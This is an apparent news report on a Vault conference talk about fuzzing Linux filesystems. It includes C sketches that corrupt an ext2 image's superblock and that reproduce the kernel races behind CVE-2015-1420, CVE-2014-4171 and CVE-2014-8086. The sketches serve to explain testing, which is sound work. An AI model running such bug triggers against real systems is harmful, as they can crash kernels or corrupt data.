Filesystem fuzzing
At the inaugural Vault conference, Sasha Levin gave a presentation on filesystem fuzzing—deliberately providing random bad input to the kernel to try to find bugs. He described different kinds of fuzzing, along with giving examples of some security bugs that were found. The conference itself focused on Linux storage and filesystems and was held March 11-12 in Boston. It attracted around 400 attendees, which has led the Linux Foundation to schedule another Vault for next year in Raleigh, North Carolina.
Levin started by saying that Linux has a problem with "shitty code". That's not because the developers are not skilled, nor is it that code review is falling by the wayside. The biggest problem is that the code does not get all that much testing until after it is merged into the mainline. At that point, users get their hands on it and start to find bugs.
Kernel testing
Testing the kernel is done by multiple groups in the ecosystem. Developers will run some tests against their code; for filesystems those tests might include xfstests. Quality assurance (QA) groups will also run tests, but those are typically limited to existing test suites with a known set of tests. The kernel is a "big, scary machine", he said, and it needs more testing.
There are two different kinds of testing: manual and automated. Manual tests are typically run by developers based on the code they changed. If a developer changes the open() call, for example, they "poke it a little bit" to see if anything is broken. That kind of testing is slow and requires a human to create, run, and interpret the tests. It also doesn't scale well to multiple testers.
Automated tests essentially perform the manual tests automatically. Once a test suite covers the basics, though, people stop adding tests except to check for regressions. There is not much done with these test suites (such as the Linux Test Project, xfstests, Filebench, IOzone, and others) to find new bugs. In addition, there is no real effort to test new features.
Users test the code by doing their normal work. They may have a technical background, but they did not review the patches and are not working on the filesystem. They are just trying to get their work done and have not set out to test anything.
There are some things missing from today's testing. Test developers don't try to anticipate what users will or won't do, so the corner cases go uncovered. Test suites generally just check for regressions. In addition, little imagination goes into test development, since creating new features is much more interesting to developers than creating new tests.
For example, he mentioned the __GFP_NOFAIL issues that have been discussed in kernel forums (including the Linux Storage, Filesystem, and Memory Management (LSFMM) Summit) recently. Dave Chinner added tests to xfstests to observe that problem, but only after the problems had been hit. That means that someone ran into those problems and ended up with a corrupted filesystem. It would be nice to find those kinds of problems before someone hits them and ends up complaining about a "shitty kernel", he said.
Fuzzing
Fuzzing is a technique that effectively creates new tests on the fly. Some of those tests are stupid, but others may find bugs. In addition, fuzzing frameworks tend to be heavily threaded, which puts a different kind of load on filesystems. The existing test suites do put a load on the filesystem, but it is basically the same load over and over again. So fuzzing can help test concurrency in the filesystem as well.
"Structure fuzzing" simply takes a filesystem image, makes some changes to it, and then tries to mount it. Some of those tests have found kernel crashes or panics at mount time. But not every corruption can or will be found at mount time because that is too expensive to check. Testing with other operations will show whether the corruption is handled appropriately post-mount.
But just flipping every bit in the filesystem image doesn't really make too much sense as a test. That's where "smart structure fuzzing" comes into play. This kind of testing is filesystem-specific as it must have some knowledge of the structure of the filesystem. Since that structure can't really change often (it resides on-disk), this kind of testing does not need to be done all of the time. It can be run occasionally, especially when there are changes that might affect the binary format.
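As a rough illustration of what "smart" structure fuzzing means, the sketch below corrupts specific fields of an ext2-style superblock rather than arbitrary bits, so that the magic number stays valid and the kernel gets past its first sanity checks. The field offsets follow the classic ext2 on-disk layout (superblock at byte 1024); the choice of fields and corrupted values is purely illustrative.

```c
/* Smart structure fuzzing sketch for an ext2-style image: corrupt
 * specific superblock fields so the magic number stays intact.
 * A little-endian host is assumed; error handling is minimal. */
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <unistd.h>

#define SB_OFFSET        1024               /* superblock starts here  */
#define S_BLOCKS_COUNT   (SB_OFFSET + 4)    /* __le32 s_blocks_count   */
#define S_LOG_BLOCK_SIZE (SB_OFFSET + 24)   /* __le32 s_log_block_size */

static void poke32(int fd, off_t off, uint32_t val)
{
    pwrite(fd, &val, sizeof(val), off);
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s image\n", argv[0]);
        return 1;
    }

    int fd = open(argv[1], O_RDWR);
    if (fd < 0) {
        perror("open");
        return 1;
    }

    srand(time(NULL));
    /* Pick one "interesting" corruption: a block count that overflows
     * internal calculations, or an absurd block-size exponent. */
    if (rand() & 1)
        poke32(fd, S_BLOCKS_COUNT, 0xffffffff);
    else
        poke32(fd, S_LOG_BLOCK_SIZE, rand());

    close(fd);
    return 0;    /* now mount the image and run a workload against it */
}
```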
"API fuzzing" is more popular, Levin said. It typically fuzzes the virtual filesystem (VFS) layer, so it is not necessarily filesystem-specific. Basically, API fuzzing tries passing lots of different values to the system calls to see if it can break something.
"Smart API fuzzing" takes that one step further by incorporating knowledge about the kinds of values that make sense as parameters to the system calls. For example, chmod() takes a path and a mode. The first check in chmod() is to see if the mode value is reasonable, so sending all of the 216 possibilities doesn't make sense all of the time. Doing that occasionally is useful, but it is overkill to test the same error path over and over.
As an example of what this kind of fuzzing can find, Levin pointed to CVE-2015-1420. It is an invalid memory access in open_by_handle_at() that was found because the fuzzer knew what the function expects. In a multithreaded test, it was able to change the size in a structure between the time it was used for allocating a buffer and the time it was used to actually read the data. Since the fuzzer had knowledge of the parameters and their types, it could change them in multiple threads.
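The sketch below shows the general shape of such a test, assuming a placeholder target file and omitting all error handling: one thread repeatedly calls open_by_handle_at() while another keeps rewriting the handle_bytes field of the shared struct file_handle (a deliberate data race). It is only an illustration of the technique; the actual bug has long been fixed, and the call requires CAP_DAC_READ_SEARCH. Build with -pthread.

```c
/* Race sketch in the spirit of CVE-2015-1420: use a file handle in
 * one thread while another keeps changing its claimed size. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

static struct file_handle *fh;
static int mount_fd;

static void *flipper(void *arg)
{
    for (;;)        /* keep changing the claimed handle size */
        fh->handle_bytes = (fh->handle_bytes == 8) ? MAX_HANDLE_SZ : 8;
    return NULL;
}

int main(void)
{
    int mount_id;

    fh = calloc(1, sizeof(*fh) + MAX_HANDLE_SZ);
    fh->handle_bytes = MAX_HANDLE_SZ;
    name_to_handle_at(AT_FDCWD, "/tmp/fuzz-target", fh, &mount_id, 0);
    mount_fd = open("/tmp", O_DIRECTORY | O_RDONLY);

    pthread_t t;
    pthread_create(&t, NULL, flipper, NULL);

    for (long i = 0; i < 10000000; i++) {   /* keep using the handle */
        int fd = open_by_handle_at(mount_fd, fh, O_RDONLY);
        if (fd >= 0)
            close(fd);
    }
    return 0;
}
```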
Having many threads all accessing the filesystem is a place where fuzzers shine. Simulating 10,000 users is easy, he said, which helps catch untested scenarios and problems that only show up when a lot of load is applied.
CVE-2014-4171 was an example of a bug that needed a high load to find. It is a local denial of service that can happen when accessing the region around a hole in a file using mmap() while that hole is being punched in another thread. It was easy to see in the code once it was discovered, but it was only found under heavy load from the fuzzer.
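A simplified reproduction of that kind of load (an assumption-laden sketch, not the original reproducer) would punch a hole in a tmpfs file from one thread while other threads fault the surrounding pages back in through an mmap() of the same file; the path, sizes, and thread counts are placeholders, and the bug itself is long fixed.

```c
/* Load sketch in the spirit of CVE-2014-4171: hole punching racing
 * with page faults on the same tmpfs file.  Build with -pthread. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <sys/mman.h>
#include <unistd.h>

#define SIZE (64 * 1024 * 1024)

static int fd;
static volatile char *map;

static void *puncher(void *arg)
{
    for (int i = 0; i < 100000; i++)
        fallocate(fd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
                  SIZE / 4, SIZE / 2);
    return NULL;
}

static void *toucher(void *arg)
{
    for (int i = 0; i < 1000; i++)
        for (long off = 0; off < SIZE; off += 4096)
            map[off] = 1;               /* fault pages back in */
    return NULL;
}

int main(void)
{
    fd = open("/dev/shm/fuzz-hole", O_RDWR | O_CREAT, 0600);   /* tmpfs */
    ftruncate(fd, SIZE);
    map = mmap(NULL, SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

    pthread_t p, t[4];
    pthread_create(&p, NULL, puncher, NULL);
    for (int i = 0; i < 4; i++)
        pthread_create(&t[i], NULL, toucher, NULL);

    pthread_join(p, NULL);
    for (int i = 0; i < 4; i++)
        pthread_join(t[i], NULL);
    return 0;
}
```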
That is one of the benefits of fuzzing, he said, that it creates tests that no filesystem developer would ever think of. It will do things that are not reasonable and don't make any sense. For example, CVE-2014-8086 is a race condition that was discovered when switching between asynchronous I/O and direct I/O, which is something that "no one really does". But a malicious user can, of course.
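Going by the talk's description, a sketch of that pattern might submit asynchronous writes through the kernel AIO interface while a second thread toggles O_DIRECT on the same descriptor with fcntl(). The file path and sizes are placeholders; the code needs libaio (build with -laio -pthread) and is only a rough approximation of the triggering workload.

```c
/* Sketch based on the talk's description of CVE-2014-8086: kernel AIO
 * writes racing with O_DIRECT being flipped on the same descriptor. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <libaio.h>
#include <pthread.h>
#include <stdlib.h>
#include <unistd.h>

static int fd;

static void *toggler(void *arg)
{
    for (int i = 0; i < 1000000; i++) {
        int flags = fcntl(fd, F_GETFL);
        fcntl(fd, F_SETFL, flags ^ O_DIRECT);   /* flip direct I/O */
    }
    return NULL;
}

int main(void)
{
    fd = open("/tmp/fuzz-aio", O_RDWR | O_CREAT, 0600);

    void *buf;
    posix_memalign(&buf, 4096, 4096);           /* O_DIRECT alignment */

    io_context_t ctx = 0;
    io_setup(32, &ctx);

    pthread_t t;
    pthread_create(&t, NULL, toggler, NULL);

    for (int i = 0; i < 100000; i++) {
        struct iocb cb, *cbs[1] = { &cb };
        struct io_event ev;

        io_prep_pwrite(&cb, fd, buf, 4096, 0);
        io_submit(ctx, 1, cbs);
        io_getevents(ctx, 1, 1, &ev, NULL);
    }

    pthread_join(t, NULL);
    io_destroy(ctx);
    return 0;
}
```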
It is nice to know that some set of tests cover most or all of the lines of code of interest, but it does not mean that the code is right. There are multiple paths through any code, so it is important to have lots of threads exercising different paths from different places. Executing rarely used paths is useful as well.
Disadvantages
There are some disadvantages to fuzzing, though. For one thing, there are no pass/fail criteria. Since it is random, you can't say that if it runs for an hour it is considered a "pass". It may miss completely obvious errors. As Peter Zijlstra put it, running for some length of time "doesn't mean that the behavior is right, just that it didn't explode". There may be plenty of bugs lurking that just don't cause a big enough problem to crash the test (or the kernel).
Fuzzing really needs to run continuously, Levin said. It can't just be run overnight and checked in the morning. Instead it should be run continuously and checked daily. Fuzzing is a resource hog too, but that actually helps test the memory-management code, especially for huge pages. The tests split lots of pages and make it hard to collapse them back into huge pages, he said.
Reproducing bugs found by the fuzzer can be quite difficult. Unfortunately, the right answer for causing the bug to happen again is often "run the fuzzer and wish for the best". It is difficult to output the results of tests because the amount of data slows the system down. Things like the last system call made aren't all that helpful, he said. Intel's Processor Trace (which Levin learned about at LSFMM) may help the situation eventually.
Levin suggested that the community should be doing more fuzzing. Developers should be doing some fuzzing before they send in patches and QA folks should be fuzzing continuously. A QA person in the audience asked about getting more information out of the kernel when it fails from fuzzing. Levin suggested setting up the kernel to do a memory dump when it gets a BUG_ON(). He will also be working on better BUG_ON() reporting.
He uses the Trinity fuzz tester for all of the API fuzzing and a different, unnamed tool for filesystem structure fuzzing. He runs Trinity in a virtual machine, while Trinity developer Dave Jones runs it on real hardware, so they find different kinds of bugs. Levin has not gotten to the point where he can run Trinity on linux-next for a week without hitting problems; so far he has not needed to look anywhere else for fuzzing tests.
[I would like to thank the Linux Foundation for travel support to Boston for Vault.]